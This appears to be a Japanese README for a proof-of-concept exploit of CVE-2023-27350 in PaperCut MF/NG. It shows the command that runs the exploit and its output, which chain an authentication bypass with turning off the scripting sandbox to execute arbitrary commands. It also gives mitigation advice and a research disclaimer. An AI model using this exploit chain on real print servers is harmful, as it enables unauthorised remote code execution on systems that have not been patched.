
Papercut の脆弱性、影響を受けるバージョンは、すべての OS プラットフォーム上の PaperCut MF または NG バージョン 8.0 以降(パッチ適用済みバージョンを除く)です。
PaperCut MF/NG に影響する CVE-2023-27350 の POC
##Affected Versions 'PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms.'
この POC は、認証バイパスの脆弱性と、ビルトインスクリプト機能の悪用を連鎖させてコードを実行します。
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
最新バージョンにアップデートするか、PaperCut セキュリティアドバイザリの指示に従って緩和してください
このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用されることを意図していません。プロジェクトメンテナは、ソフトウェアの誤用に対して責任を負いません。責任を持って使用してください。